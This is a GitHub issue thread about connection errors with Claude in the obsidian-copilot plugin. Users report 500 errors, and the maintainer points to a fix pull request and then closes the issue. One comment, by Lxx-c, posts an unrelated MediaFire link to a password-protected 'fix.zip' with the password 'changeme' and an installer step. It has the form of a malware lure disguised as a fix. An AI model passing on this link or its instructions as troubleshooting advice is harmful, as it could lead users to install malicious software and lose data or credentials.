### ISSUE TITLE
Claude / Anthropic Connection Error

### ISSUE THREAD

**Issue by PrettyCities** [logancyang/obsidian-copilot#536]
- [x] Screenshot of note + Copilot chat pane + dev console added **(required)**
![image](https://github.com/user-attachments/assets/46c7abeb-6945-42c7-8c40-eeba0f89a198)

I'm getting connection errors when trying to use Claude.

**Describe how to reproduce**

* Set Claude as model
* Add API key
* Try to use model
* Connection error

**Expected behavior**
* Requests succeed

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by logancyang** [comment]
Hmm, could be related to #525? It's working for me though. Has anyone else seen this?

**Comment by hb-man** [comment]
Claude still works without errors for me.

**Comment by ondanegra** [comment]
just updated plugin, still getting the server error :
"Failed to load resource: the server responded with a status of 500 (Internal Server Error)
plugin:copilot:94756     POST http://localhost:53001/v1/messages 500 (Internal Server Error)"

**Comment by logancyang** [comment]
@ondanegra I'm working on this one https://github.com/logancyang/obsidian-copilot/pull/567, it will fix your issue when released.

**Comment by logancyang** [comment]
Closing as new model mechanism is out. If not working pls reopen.
